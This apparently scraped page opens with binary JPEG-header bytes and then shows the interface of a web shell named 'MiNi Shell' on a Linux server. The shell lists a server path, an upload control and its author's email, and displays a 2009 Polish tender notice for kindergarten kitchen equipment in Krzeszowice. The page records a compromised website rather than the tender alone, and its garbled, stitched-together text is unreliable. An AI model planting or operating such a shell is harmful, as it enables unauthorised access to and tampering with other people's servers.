JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090416/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20090416/108518-N-2009.html

<p class="kh_header"><b>Krzeszowice: Dostawa i montaż technologii kuchni w Przedszkolu samorządowym w Tenczynku</b><br>
<b>Numer ogłoszenia: 108518 - 2009; data zamieszczenia: 16.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miejski w Krzeszowicach , ul. Ogrodowa 1, 32-065 Krzeszowice, woj. małopolskie, tel. 012 2520855, faks 012 2520802.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.krzeszowice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa i montaż technologii kuchni w Przedszkolu samorządowym w Tenczynku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot niniejszego zamówienia obejmuje dostawę i montaż technologii kuchni w przedszkolu samorządowym w Tenczynku:
W przedmiocie zamówienia mieści się:
Dostawa urządzeń,  
Transport urządzeń do miejsca zamontowania
Montaż urządzeń po wykonaniu przez zamawiającego niezbędnych robót budowlanych, 
Rozruch techniczny i technologiczny oraz przeszkolenie pracowników obsługi 
Przygotowanie i dostarczenie instrukcji obsługi 
Serwis urządzeń w okresie gwarancji 

Zamawiający jest zainteresowany dostawą jedynie fabrycznie nowych urządzeń i kompleksową realizacją zamówienia. Zamawiający nie dopuszcza powierzenia podwykonawcy jakichkolwiek działań związanych z dostawa, montażem, rozruchem i serwisem urządzeń.
Informacje dotyczące typów urządzeń zostały przestawione w dokumentacji projektowej 
WYPOSAŻENIE SZATNI, SANITARIATÓW PERSONELU:
wg. zestawienia projektu  
szafka ubraniowa 3 osobowa z przegrodami ( podział na odzież wierzchnią i roboczą) 
szafka ubraniowa 1 osobowa z przegrodami ( podział na odzież wierzchnią i roboczą) 
apteczka, 

WYPOSAŻENIE POMIESZCZENIA PORZĄDKOWEGO:
wg. zestawienia projektu 
1.	zlewozmywak gospodarczy + bateria ścienna 
2.	regał systemowy 4 półkowy, stal węglowa chromowana, półki ażurowe przestawne,

WYPOSAŻENIE OBIERALNI WARZYW:
wg. zestawienia
1.	regał nierdzewny 5 półkowy, półki pełne przestawne,
2.	obieraczka do warzyw na postawie z separatorem, wsad 10 kg. Wydajność 250-350 kg/h system ścierania dolny + boczny
3.	basen 1 komorowy, wys. komory 300 mm
4.	bateria profesjonalna, stołowa jednotrzonowa, wylewka 30 cm pokrętła do regulacji, woda ciepła, zimna,
5.	stół szkieletowy,
6.	rozdrabniarka do warzyw, wydajność 100-4000 kg /h tarcza o śr. 210 mm w wyposażeniu podstawowym 5 tarcz ścierających,
7.	umywalka nierdzewna + bateria umywalkowa,

WYPOSAŻENIE MAGAZYNU JAJ:
wg. zestawienia 
1.	chłodziarka na jaja, poj. 150 l, obudowa biała,
2.	stół ze zlewozmywakiem 1 komorowym P i półką,
3.	bateria profesjonalna, stołowa jednotrzonowa, wylewka 30 cm, pokrętła do regulacji, woda ciepła, zimna,
4.	naświetlacz do odkażania jaj szufladowy, wsad 30 jaj, obudowa nierdzewna,
5.	umywalka nierdzewna + bateria umywalkowa,

WYPOSAŻENIE MAGAZYNU ARTYKUŁÓW SPOŻYWCZYCH (SUCHYCH):
wg. zestawienia 
1.	stół szkieletowy z półką,
2.	waga stołowa, zakres ważenia 15 kg. 
3.	regał modułowy 5 aluminiowo polietylenowy 5 półkowy półki przestawne ażurowe ruszty polietylenowe demontowane nadające się do mycia w zmywarce,
  
WYPOSAŻENIE MAGAZYNU SPOŻYWCZEGO ( CHŁODNICZY):
wg. zestawienia
1.	Szafa chłodnicza poj. 510 l , 1 drzwi obudowa nierdzewna wymuszony obieg powietrza w komorze 
2.	szafa mroźnicza poj. 510 l. 1 drzwi obudowa nierdzewna wymuszony obieg powierza w komorze,
 
WYPOSAŻENIE KUCHNI:
wg. zestawienia
1.	stół ze zlewozmywakiem 1 komorowym L i półką 
2.	bateria profesjonalna, stołowa jednotrzonowa, wylewka 30 cm, pokrętła do regulacji , woda ciepła, zimna,
3.	stół szkieletowy z półką, szuflada podwieszana 
4.	stół szkieletowy z półką 
5.	półka ścienna przestawna, pojedyńcza 
6.	szafa chłodnicza poj. 700 l , 1 drzwi pełne, obudowa nierdzewna wymuszony obieg powietrza w komorze, linia GN 2/1,
7.	regał modułowy aluminiowo polietylenowy 5 półkowy półki przestawne, ażurowe ruszty polietylenowe demontowane nadające się do mycia w zmywarce 
8.	basen 1 komorowy wys. komory 300 mm
9.	bateria prysznicowa z wylewką stołowa jednotrzonowa pokrętła do regulacji woda ciepła i zimna,
10.	odwodnienie liniowe, nierdzewne 
11.	stół ze zlewozmywakiem 1 komorowym P połka i blokiem 2 szuflad P 
12.	bateria profesjonalna, stołowa jednotrzonowa wylewka 30 cm pokrętła do regulacji, woda ciepła, zimna, 
13.	półka ścienna przestawna podwójna, 
14.	stół szkieletowy z półką i blokiem 2 szuflad P miejsce na chłodziarkę podblatową,
15.	cutter / wyrabianie ciast, krojenie, siekanie poj. 8 l, 
16.	kuchnia gazowa 4 palnikowa z piekarnikiem elektrycznym, 700 x 750 x 850 cm,
17.	kocioł gazowy do zblokowania poj. 80 l. podgrzew pośredni, 
18.	piec konwekcyjno - parowy poj. 10 x 1/1 GN sterowanie elektroniczne, wbudowana wytwornica pary, 
19.	podstawa pod piec z prowadnicami na pojemniki GN, 
20.	zmiękczacz jonitowy wody, 
21.	odwodnienie liniowe, nierdzewne,
22.	okap wyciągowy centralny z łapaczami tłuszczu, oświetleniem króćcami ( wg. proj. wentylacji) i zawiesiami,  
23.	bemar jezdny ze wspólnym sterowaniem poj. 2 x 1 /1 GN - 200 
24.	stół korpusowy z blokiem 2 szuflad i szafką z drzwiami przesuwnymi, 
25.	warnik do wody, wydajność 35 l/h
26.	umywalka nierdzewna + bateria umywalkowa, 
27.	wózek kelnerski 3 półkowy - 1 szt.

ZMYWALNIA NACZYŃ STOŁOWYCH:
wg. zestawienia 
1.	stół załadowczy do zmywarki ze zlewozmywakiem 1 komorowym z otworem na odpadki otwór pod młynek koloidalny,
2.	bateria prysznicowa z wylewką, stołowa jednotrzonowa, pokrętła do regulacji, woda ciepła , zimna 
3.	pojemnik nierdzewny na odpady, jezdny z pokrywą poj. 50 l 
4.	młynek koloidalny przystosowany do pracy ciągłej, wbudowany wyłącznik pneumatyczny,
5.	zmywarka kapturowa wyd. 900 tabl. / godz. Średnica naczyń do 420 mm dozownik na detergent + nabłyszczasz 
6.	zmiękczacz jonitowy wody
7.	stół wyładowczy z prowadnicami na kosze, 
8.	szafa przelotowa na czyste naczynia, 4 poziomy półek , drzwi przesuwne, 

Wspólny Słownik Zamówień (CPV):   - wyposażenie 
UWAGA - Wymiary urządzeń oraz poszczególne typy zostały określone w dokumentacji projektowej. Można zastosować urządzenia równoważne o tych samych funkcjach i podobnych  parametrach. Ich rodzaj i przeznaczenie muszą odpowiadać opisowi i przeznaczeniu zawartym  w metryczce przykładowego modelu określonego w kolumnie nr 3 specyfikacji sprzętu. Wszystkie dostarczone urządzenia muszą być kompatybilne ze sobą i zapewnić współpracę. Wybrany dostawca razem z urządzeniami dostarczy wystawione przez producenta dokumenty potwierdzające posiadane przez nie parametry techniczne..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 42.00.00.00-6, 39.00.00.00-2, 31.00.00.00-6, 35.00.00.00-4.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wysokość wadium - każdy Wykonawca zobowiązany jest zabezpieczyć swą ofertę wadium w wysokości: 3.000,00 zł (trzy tysiące złotych)
Forma wadium.
Wadium może być wniesione w następujących formach:
pieniądzu;
poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
gwarancjach bankowych;
gwarancjach ubezpieczeniowych;
poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158, z późn. zm.).
Wadium wnoszone w ww formach musi być opatrzone adnotacją: Dostawa i montaż  technologii kuchni w Przedszkolu samorządowym w Tenczynku
W przypadku składania przez Wykonawcę wadium w formie gwarancji, gwarancja powinna być sporządzona zgodnie z obowiązującym prawem i winna zawierać następujące elementy:
nazwę dającego zlecenie (Wykonawcy), beneficjenta gwarancji (Zamawiającego), gwaranta (banku lub instytucji ubezpieczeniowej udzielających gwarancji) oraz wskazanie ich siedzib,
określenie wierzytelności, która ma być zabezpieczona gwarancją,
kwotę gwarancji,
termin ważności gwarancji
zobowiązanie gwaranta do:zapłacenia kwoty gwarancji na pierwsze pisemne żądanie Zamawiającego zawierające oświadczenie, iż Wykonawca, którego ofertę wybrano:
odmówił podpisania umowy na warunkach określonych w ofercie, lub
nie wniósł zabezpieczenia należytego wykonania umowy, lub
zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie Wykonawcy;
Miejsce i sposób wniesienia wadium.
Wadium wnoszone w pieniądzu należy wpłacić przelewem na następujący rachunek Zamawiającego: Urząd Miejski w Krzeszowicach, Bank Ochrony Środowiska S.A. Oddział Kraków Nr konta 601540 1115 2001 6000 1414 0001
Do oferty należy dołączyć kopię polecenia przelewu.
Wadium wniesione w formie innej niż pieniężnej należy dołączyć do złożonej oferty.
Termin wniesienia wadium.
Wadium należy wnieść przed upływem terminu składania ofert, przy czym wniesienie wadium w pieniądzu, za pomocą przelewu bankowego, Zamawiający będzie uważał za skuteczne tylko wówczas, gdy bank prowadzący rachunek Zamawiającego potwierdzi, że otrzymał taki przelew przed upływem terminu składania ofert. 
W wymienionym przypadku dołączenie do oferty kopii polecenia przelewu wystawionego przez Wykonawcę jest warunkiem koniecznym, ale nie wystarczającym do stwierdzenia przez Zamawiającego terminowego wniesienia wadium przez Wykonawcę.
W przypadku wnoszenia wadium w gotówce Zamawiający zaleca dokonanie wpłaty na rachunek bankowy minimum 2 dni robocze przed terminem składania ofert, aby kwota wadium zostala zaksięgowana na rachunku Zamawiającego przed datą i godziną złożenia oferty.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Wykonawcy ubiegający się o zamówienie publiczne muszą spełniać niżej  wymienione warunki udziału w postępowaniu:
Posiadać uprawnienia do wykonywania działalności lub czynności w zakresie odpowiadającym przedmiotowi zamówienia oraz nie podlegać wykluczeniu na podstawie art. 24 U.P.z.p. W celu potwierdzenia spełniania niniejszego warunku Wykonawcy zobowiązani są przedłożyć następujące dokumenty:
Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert (w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców w ofercie muszą być złożone przedmiotowe dokumenty dla każdego z nich),
Aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego, potwierdzające odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, (w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców w ofercie muszą być złożone przedmiotowe dokumenty dla każdego z nich )
Oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu, sporządzone na podstawie wzoru stanowiącego załącznik nr 2 do niniejszej SIWZ,
Posiadać niezbędną wiedzę i doświadczenie oraz dysponować potencjałem technicznym i osobami zdolnymi do wykonania niniejszego zamówienia lub przedłożyć pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia. 
W celu potwierdzenia spełniania niniejszego warunku Wykonawcy zobowiązani są przedłożyć:
wykaz dostaw sporządzony według wzoru stanowiącego załącznik nr 3 do niniejszej SIWZ oraz dokumenty potwierdzające należyte ich wykonanie (referencje).
wykaz osób odpowiedzialnych za wykonanie zadania według  wzoru stanowiącego załącznik nr 4 do niniejszej SIWZ 
Za spełnienie warunku będzie uważane:
dostawa wraz z montażem w okresie ostatnich 3 lat przed dniem wszczęcia postępowania, a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie przynajmniej 1-go wyposażenia kuchni o wartości przekraczającej kwotę 100.000 zł. 
Znajdować się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie niniejszego zamówienia. W szczególności Wykonawca musi posiadać ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności. 
W celu potwierdzenia spełniania niniejszego warunku Wykonawca musi złożyć polisę ubezpieczeniową, a w przypadku jej braku inny dokument potwierdzający, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności.Stosownie do treści § 2 rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 r. w sprawie rodzajów dokumentów, jakich może żądać Zamawiający od Wykonawcy oraz form, w jakich te dokumenty mogą być składane, jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa powyżej w: pkt. 9.1.1. składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
nie otwarto jego likwidacji ani nie ogłoszono upadłości;
nie orzeczono wobec niego zakazu ubiegania się o zamówienie;
Stosownie do treści § 2 ust. 2 powołanego powyżej rozporządzenia Prezesa Rady Ministrów, dokumenty, o których mowa powyżej w pkt 9.2.1. oraz 9.2.2. powinny być wystawione nie  wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
Ocena spełniania warunków zostanie dokonana wg formuły: spełnia-nie spełnia.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Kompletna oferta musi zawierać:
Formularz Oferty, sporządzony na podstawie wzoru stanowiącego załącznik nr 1 do niniejszej SIWZ, z dołączonym  cennikiem ceny jednostkowej dla każdego urządzenia oddzielnie z podaniem również wartości montażu.  
Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert (w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców w ofercie muszą być złożone przedmiotowe dokumenty dla każdego z nich),
Aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego, potwierdzające odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, (w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców w ofercie muszą być złożone przedmiotowe dokumenty dla każdego z nich )
Oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu, sporządzone na podstawie wzoru stanowiącego załącznik nr 2 do niniejszej SIWZ,
Wykaz zrealizowanych dostaw sporządzony na podstawie wzoru stanowiącego załącznik nr 3 do niniejszej SIWZ wraz z dokumentami potwierdzającymi należyte ich wykonanie, Foldery, katalogi, zdjęcia przedstawiające oferowane urządzenia i zestawy, oraz zdjęcia zrealizowanych zamówień. 
Certyfikaty na znak bezpieczeństwa dla zaproponowanych urządzeń .
Wykaz osób odpowiedzialnych za wykonanie zadania według  wzoru stanowiącego załącznik nr 4 do niniejszej SIWZ 
Polisę ubezpieczeniową lub jej kopię potwierdzoną za zgodność z oryginałem lub inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w związku z prowadzoną działalnością.
Stosowne Pełnomocnictwo(a) - w przypadku, gdy upoważnienie do podpisania oferty nie wynika bezpośrednio ze złożonego w ofercie odpisu z właściwego rejestru albo zaświadczenia o wpisie do ewidencji działalności gospodarczej,
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, dokument ustanawiający Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego.
Parafowany przez wykonawcę wzór umowy stanowiący Część II do niniejszej SIWZ
Pożądane przez Zamawiającego jest złożenie w ofercie spisu treści z wyszczególnieniem ilości stron wchodzących w skład oferty.
Wykonawca może zastrzec w ofercie (oświadczeniem zawartym w Formularzu Oferty), iż Zamawiający nie będzie mógł ujawnić informacji stanowiących tajemnice przedsiębiorstwa w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www. krzeszowice.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Krzeszowicach Wydział Inwestycji Remontów i Infrastruktury Technicznej tel. 012 - 252-08-06.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.04.2009 godzina 09:30, miejsce: Urząd Miejski w Krzeszowicach ul. Grunwaldzka 4 dziennik podawczy.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com